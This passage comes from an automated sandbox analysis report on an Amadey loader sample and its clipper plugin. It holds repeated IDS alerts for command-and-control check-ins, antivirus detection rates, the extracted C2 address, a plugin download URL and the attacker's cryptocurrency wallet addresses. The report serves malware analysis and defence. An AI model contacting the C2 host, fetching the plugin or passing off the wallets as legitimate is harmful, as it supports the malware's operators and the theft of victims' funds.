                            Source Port:50265
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450135802027700 02/08/23-17:39:29.463987
                            SID:2027700
                            Source Port:50135
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450207802027700 02/08/23-17:39:49.091510
                            SID:2027700
                            Source Port:50207
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449807802027700 02/08/23-17:37:56.250217
                            SID:2027700
                            Source Port:49807
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450087802027700 02/08/23-17:39:17.420203
                            SID:2027700
                            Source Port:50087
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449951802027700 02/08/23-17:38:39.117123
                            SID:2027700
                            Source Port:49951
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449759802027700 02/08/23-17:37:42.369299
                            SID:2027700
                            Source Port:49759
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450107802027700 02/08/23-17:39:22.315655
                            SID:2027700
                            Source Port:50107
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449909802027700 02/08/23-17:38:27.165242
                            SID:2027700
                            Source Port:49909
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450130802027700 02/08/23-17:39:28.215637
                            SID:2027700
                            Source Port:50130
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449695802027700 02/08/23-17:37:24.659551
                            SID:2027700
                            Source Port:49695
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449837802027700 02/08/23-17:38:06.766539
                            SID:2027700
                            Source Port:49837
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449873802027700 02/08/23-17:38:18.447657
                            SID:2027700
                            Source Port:49873
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450237802027700 02/08/23-17:39:56.348459
                            SID:2027700
                            Source Port:50237
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450029802027700 02/08/23-17:39:03.307263
                            SID:2027700
                            Source Port:50029
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449878802027700 02/08/23-17:38:19.667672
                            SID:2027700
                            Source Port:49878
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450160802027700 02/08/23-17:39:35.471399
                            SID:2027700
                            Source Port:50160
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449763802027700 02/08/23-17:37:43.325860
                            SID:2027700
                            Source Port:49763
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449769802027700 02/08/23-17:37:44.792125
                            SID:2027700
                            Source Port:49769
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449852802027700 02/08/23-17:38:10.929233
                            SID:2027700
                            Source Port:49852
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450293802027700 02/08/23-17:40:10.028487
                            SID:2027700
                            Source Port:50293
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449702802027700 02/08/23-17:37:26.146506
                            SID:2027700
                            Source Port:49702
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449858802027700 02/08/23-17:38:14.073652
                            SID:2027700
                            Source Port:49858
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450143802027700 02/08/23-17:39:31.370431
                            SID:2027700
                            Source Port:50143
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450214802027700 02/08/23-17:39:50.800451
                            SID:2027700
                            Source Port:50214
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450299802027700 02/08/23-17:40:11.500143
                            SID:2027700
                            Source Port:50299
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450125802027700 02/08/23-17:39:26.996304
                            SID:2027700
                            Source Port:50125
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450036802027700 02/08/23-17:39:05.033130
                            SID:2027700
                            Source Port:50036
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450232802027700 02/08/23-17:39:55.156269
                            SID:2027700
                            Source Port:50232
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450321802027700 02/08/23-17:40:19.144641
                            SID:2027700
                            Source Port:50321
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450054802027700 02/08/23-17:39:09.433030
                            SID:2027700
                            Source Port:50054
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449824802027700 02/08/23-17:38:00.290375
                            SID:2027700
                            Source Port:49824
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449919802027700 02/08/23-17:38:29.584683
                            SID:2027700
                            Source Port:49919
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449797802027700 02/08/23-17:37:52.616336
                            SID:2027700
                            Source Port:49797
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450309802027700 02/08/23-17:40:14.212818
                            SID:2027700
                            Source Port:50309
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449913802027700 02/08/23-17:38:28.132055
                            SID:2027700
                            Source Port:49913
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449735802027700 02/08/23-17:37:36.528447
                            SID:2027700
                            Source Port:49735
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449791802027700 02/08/23-17:37:50.073108
                            SID:2027700
                            Source Port:49791
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449931802027700 02/08/23-17:38:34.030037
                            SID:2027700
                            Source Port:49931
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449842802027700 02/08/23-17:38:07.992649
                            SID:2027700
                            Source Port:49842
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449998802027700 02/08/23-17:38:55.809592
                            SID:2027700
                            Source Port:49998
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449779802027700 02/08/23-17:37:47.176231
                            SID:2027700
                            Source Port:49779
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449975802027700 02/08/23-17:38:47.996045
                            SID:2027700
                            Source Port:49975
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450115802027700 02/08/23-17:39:24.252625
                            SID:2027700
                            Source Port:50115
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450020802027700 02/08/23-17:39:01.119660
                            SID:2027700
                            Source Port:50020
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450026802027700 02/08/23-17:39:02.587070
                            SID:2027700
                            Source Port:50026
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449886802027700 02/08/23-17:38:21.612683
                            SID:2027700
                            Source Port:49886
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450008802027700 02/08/23-17:38:58.198992
                            SID:2027700
                            Source Port:50008
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450204802027700 02/08/23-17:39:48.373919
                            SID:2027700
                            Source Port:50204
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450092802027700 02/08/23-17:39:18.634986
                            SID:2027700
                            Source Port:50092
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450181802027700 02/08/23-17:39:42.912009
                            SID:2027700
                            Source Port:50181
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450270802027700 02/08/23-17:40:04.450424
                            SID:2027700
                            Source Port:50270
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449941802027700 02/08/23-17:38:36.694908
                            SID:2027700
                            Source Port:49941
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449947802027700 02/08/23-17:38:38.153087
                            SID:2027700
                            Source Port:49947
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449740802027700 02/08/23-17:37:37.821742
                            SID:2027700
                            Source Port:49740
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449781802027700 02/08/23-17:37:47.651800
                            SID:2027700
                            Source Port:49781
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449870802027700 02/08/23-17:38:17.723085
                            SID:2027700
                            Source Port:49870
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449929802027700 02/08/23-17:38:33.000268
                            SID:2027700
                            Source Port:49929
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450258802027700 02/08/23-17:40:01.487832
                            SID:2027700
                            Source Port:50258
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449988802027700 02/08/23-17:38:53.036500
                            SID:2027700
                            Source Port:49988
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449893802027700 02/08/23-17:38:23.319978
                            SID:2027700
                            Source Port:49893
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450255802027700 02/08/23-17:40:00.759372
                            SID:2027700
                            Source Port:50255
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449899802027700 02/08/23-17:38:24.742098
                            SID:2027700
                            Source Port:49899
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450169802027700 02/08/23-17:39:37.723515
                            SID:2027700
                            Source Port:50169
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449728802027700 02/08/23-17:37:34.522765
                            SID:2027700
                            Source Port:49728
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449982802027700 02/08/23-17:38:50.300928
                            SID:2027700
                            Source Port:49982
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450010802027700 02/08/23-17:38:58.684721
                            SID:2027700
                            Source Port:50010
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450077802027700 02/08/23-17:39:14.979085
                            SID:2027700
                            Source Port:50077
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450166802027700 02/08/23-17:39:36.964836
                            SID:2027700
                            Source Port:50166
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450316802027700 02/08/23-17:40:17.940023
                            SID:2027700
                            Source Port:50316
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450191802027700 02/08/23-17:39:45.295486
                            SID:2027700
                            Source Port:50191
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449801802027700 02/08/23-17:37:54.834263
                            SID:2027700
                            Source Port:49801
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450280802027700 02/08/23-17:40:06.937120
                            SID:2027700
                            Source Port:50280
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449868802027700 02/08/23-17:38:17.239443
                            SID:2027700
                            Source Port:49868
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449753802027700 02/08/23-17:37:40.932450
                            SID:2027700
                            Source Port:49753
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449712802027700 02/08/23-17:37:28.587243
                            SID:2027700
                            Source Port:49712
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449957802027700 02/08/23-17:38:40.557978
                            SID:2027700
                            Source Port:49957
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450112802027700 02/08/23-17:39:23.514612
                            SID:2027700
                            Source Port:50112
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450242802027700 02/08/23-17:39:57.575391
                            SID:2027700
                            Source Port:50242
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449750802027700 02/08/23-17:37:40.228697
                            SID:2027700
                            Source Port:49750
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450201802027700 02/08/23-17:39:47.669674
                            SID:2027700
                            Source Port:50201
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449880802027700 02/08/23-17:38:20.163284
                            SID:2027700
                            Source Port:49880
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450331802027700 02/08/23-17:40:21.630470
                            SID:2027700
                            Source Port:50331
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450153802027700 02/08/23-17:39:33.775747
                            SID:2027700
                            Source Port:50153
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450283802027700 02/08/23-17:40:07.638780
                            SID:2027700
                            Source Port:50283
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450194802027700 02/08/23-17:39:45.998769
                            SID:2027700
                            Source Port:50194
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450319802027700 02/08/23-17:40:18.663429
                            SID:2027700
                            Source Port:50319
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450023802027700 02/08/23-17:39:01.855210
                            SID:2027700
                            Source Port:50023
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450064802027700 02/08/23-17:39:11.871504
                            SID:2027700
                            Source Port:50064
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449903802027700 02/08/23-17:38:25.713449
                            SID:2027700
                            Source Port:49903
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450303802027700 02/08/23-17:40:12.489380
                            SID:2027700
                            Source Port:50303
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449944802027700 02/08/23-17:38:37.430400
                            SID:2027700
                            Source Port:49944
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449725802027700 02/08/23-17:37:32.936276
                            SID:2027700
                            Source Port:49725
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449855802027700 02/08/23-17:38:12.691905
                            SID:2027700
                            Source Port:49855
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449896802027700 02/08/23-17:38:24.036974
                            SID:2027700
                            Source Port:49896
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449985802027700 02/08/23-17:38:51.647161
                            SID:2027700
                            Source Port:49985
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449814802027700 02/08/23-17:37:57.900701
                            SID:2027700
                            Source Port:49814
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllURL Reputation: Label: malware
                            Source: 62.204.41.4/Gol478Ns/index.phpURL Reputation: Label: malware
                            Source: http://62.204.41.4/Gol478Ns/index.phpURL Reputation: Label: malware
                            Source: file.exeReversingLabs: Detection: 69%
                            Source: file.exeVirustotal: Detection: 52%Perma Link
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dllReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeReversingLabs: Detection: 51%
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeReversingLabs: Detection: 35%
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeReversingLabs: Detection: 81%
                            Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 80%
                            Source: file.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                            Source: 19.2.mnolyk.exe.d50000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                            Source: 21.2.rundll32.exe.6f460000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010E2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A72F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00A72F1D

                            Compliance

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeUnpacked PE file: 2.2.aTaf.exe.400000.0.unpack
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: wextract.pdb source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000000.444906113.000000000139E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.446524500.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.834452126.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.451321345.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.450744153.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000000.531763918.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000002.531978816.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000000.658255066.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000002.658522671.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.787572067.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.786896647.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                            Source: Binary string: Healer.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004BBA000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.416696337.00000000001F2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: QC:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.834537684.000000006F46F000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                            Source: Binary string: Healer.pdbH5 source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_010E2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A72390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138FC58 FindFirstFileExW,8_2_0138FC58

                            Networking

                            barindex
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49695 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49697 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49698 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49699 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49700 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49701 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49702 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49703 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49704 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49705 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49706 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49707 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49708 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49709 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49710 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49711 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49712 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49713 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49714 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49715 -> 62.204.41.4:80
